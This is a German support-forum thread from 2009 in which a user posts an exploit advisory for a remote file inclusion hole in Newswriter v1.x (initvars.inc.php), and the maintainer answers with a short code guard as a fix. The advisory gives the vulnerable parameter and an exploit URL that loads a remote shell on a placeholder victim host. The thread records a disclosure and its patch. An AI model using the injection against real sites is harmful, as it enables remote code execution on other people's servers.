Antwort schreiben 
 
Themabewertung:
  • 0 Bewertungen - 0 im Durchschnitt
  • 1
  • 2
  • 3
  • 4
  • 5
[FOUND BUG] Newswriter v1.x (initvars.inc.php) Remote File Inclusion
21.01.2009, 06:35 AM
Beitrag: #1
[FOUND BUG] Newswriter v1.x (initvars.inc.php) Remote File Inclusion
Hallo bitte so schnell wie möglich fixxen da ich leider keine supportmail oder sowas gefunden habe muss ich das leider hier adden
Code:
################################################################################​##############################
#                             **           ****   ****          ******                                       #
#                            ***          */// * */// *        //////*                                       #
#                           //**  **   **/    /*/    /* **   **     /*                                       #
#                            /** //** **    ***    *** //** **      *                                        #
#                            /**  //***    /// *  /// * //***      *                                         #
#                            /**   **/**  *   /* *   /*  **/**    *                                          #
#                            **** ** //**/ **** / ****  ** //**  *                                           #
#                           //// //   //  ////   ////  //   //  /                                            #
################################################################################​##############################
#                          ??           PROUDLY TO PRESENT:         ???                                      #
#            ? ?? ????????????????????????????????????????????????????????????????????? ?? ?                 #
#                          Newswriter v1.x (initvars.inc.php) Remote File Inclusion                          #
#            ? ?? ????????????????????????????????????????????????????????????????????? ?? ?                 #
#             ????????  [ SUPPLiER ..................................... 1x33x7            ]  ????????       #
#             ???????   [ Founder ...................................... Bloodman          ]   ???????       #
#             ??????    [ Company/Coder ................................ faqboard???       ]    ??????       #
#             ?????     [ Web-Script ................................... Newswriter v1.x   ]     ?????       #
#             ????      [ Bug .......................................... RFI               ]      ????       #
#             ???       [ Security Risk ................................ Very High         ]       ???       #
#             ???       [ RELEASE DATE ................................. 2009-01-21        ]        ??       #
#             ??????           ?????            Bug/Info:           ?????            ??????                  #
#        ?????                                Hello guys,                                        ?????       #
#       ????? I found a Remote File Inclusion Bug in Newswriter SW 1.x the                       ?????       #
#       ????? php file initvars.inc.php produce an error and will give you                       ?????       #
#       ????? something like this :                                                              ?????       #
#       ????? Warning: main(): Failed opening 'language/.lang' for inclusion (include_path='.')  ?????       #
#       ????? in /srv/www/htdocs/web344/html/news/include/initvars.inc.php on line 142           ?????       #
#       ????? Error loading language file                                                        ?????       #
#       ?????                                                                                    ?????       #
#       ?????   This Remote File Iclusion should work on all Newswriter v1.x test your version   ?????       #
#       ?????                                    Bug :                                           ?????       #
#       ?????              /news/include/initvars.inc.php?NWCONF_SYSTEM[server_path]=            ?????       #
#       ?????                                Exploit :                                           ?????       #
#       ????? www.victim.com/news/include/initvars.inc.php?NWCONF_SYSTEM[server_path]=SHELL      ?????       #
#       ?????                                   Dork :                                           ?????       #
#       ?????                         find your own dork to find Newswriter                      ?????       #
#            ?????                                                                          ?????            #
#             ??????           ?????            Gr33tz:             ?????            ??????                  #
#            ??????? ???           - all 1x33x7 members                          ??? ???????                 #
#            ??????? ???           - all XSS-Crew members                        ??? ???????                 #
#            ??????? ???           - all uNkn0wn members                         ??? ???????                 #
#            ??????? ???           - all ratnetwork members                      ??? ???????                 #
#            ??????? ???           - all others i forgot :)                      ??? ???????                 #
#            ??????           ?????         Special Gr33tz:         ?????            ??????                  #
#            ??????? ???           - Baba,Apu,Madda,Willi,S0l1d,                 ??? ???????                 #
#            ??????? ???             Ic3Drag0n,Fink,iD,Bronco,Rat                ??? ???????                 #
#            ??????? ???             All other i have forgot :)                  ??? ???????                 #
#            ??????? ???                                                         ??? ???????                 #
#              ????   ?????????                                           ?????????   ????                   #
#                    ????   ?????????                               ?????????   ????                         #
#                         ????    ?????????                     ?????????   ????                             #
#                                ????   ????????? BYE ALL ?????????   ????                                   #
################################################################################​##############################

wünsche noch einen schönen tag Smile
Alle Beiträge dieses Benutzers finden
Diese Nachricht in einer Antwort zitieren
23.01.2009, 08:16 AM (Dieser Beitrag wurde zuletzt bearbeitet: 23.01.2009 08:17 AM von basti.)
Beitrag: #2
RE: [FOUND BUG] Newswriter v1.x (initvars.inc.php) Remote File Inclusion
Verschoben weil: Wenn dann ist es ein Bug und keine News.
Webseite des Benutzers besuchen Alle Beiträge dieses Benutzers finden
Diese Nachricht in einer Antwort zitieren
24.01.2009, 15:57 PM
Beitrag: #3
RE: [FOUND BUG] Newswriter v1.x (initvars.inc.php) Remote File Inclusion
Zum Bug: Das ganze funktioniert natürlich nur, wenn url_fopen = on ist und register_globals = on.
Bitte folgendes in die initvars.inc.php einfügen:
Zitat:if(!defined('HAUPTSEITE')) {
header("Location: ../index.php");
exit;
}

Damit ist das dann kein Problem mehr.

cu basti

iwebspace.de | Webspaceorder - Bestellsystem für ISP
Webseite des Benutzers besuchen Alle Beiträge dieses Benutzers finden
Diese Nachricht in einer Antwort zitieren
Antwort schreiben 


Möglicherweise verwandte Themen...
Thema: Verfasser Antworten: Ansichten: Letzter Beitrag
  Funktion newswriter() in index.php von Version 1.43 wurzer 5 8,869 04.02.2009 19:21 PM
Letzter Beitrag: basti
  Sonderzeichen Fehler im Newswriter ! elacqua 9 10,077 04.03.2007 18:58 PM
Letzter Beitrag: cappo
  Phishing-Seiten über Newswriter? Mana 2 4,099 11.02.2007 22:30 PM
Letzter Beitrag: basti
  Problem mit Newswriter MauTom 17 13,106 13.01.2006 12:36 PM
Letzter Beitrag: kkoehne
  Probleme mit der Textformatierung im Newswriter-Editor Ludinator 2 3,753 03.08.2005 06:41 AM
Letzter Beitrag: basti
  NewsWriter 1.4 - Adminbereich -> Optionen Buddy Hollyday 2 3,267 05.09.2004 11:08 AM
Letzter Beitrag: basti
  Newswriter 1.4 Admin Bereich Ewald 2 3,610 17.08.2004 20:49 PM
Letzter Beitrag: basti
  Newswriter Newsletter funzt nicht! paelzersebbi 2 3,517 28.05.2004 09:23 AM
Letzter Beitrag: basti
  [Newswriter 1.2] Rubriken nicht mehr mögich Screw Driver 14 10,978 16.10.2003 10:13 AM
Letzter Beitrag: kai_

Gehe zu:


Benutzer, die gerade dieses Thema anschauen: 1 Gast/Gäste

Kontakt | faqboard.info | Nach oben | Zum Inhalt | Archiv-Modus | RSS-Synchronisation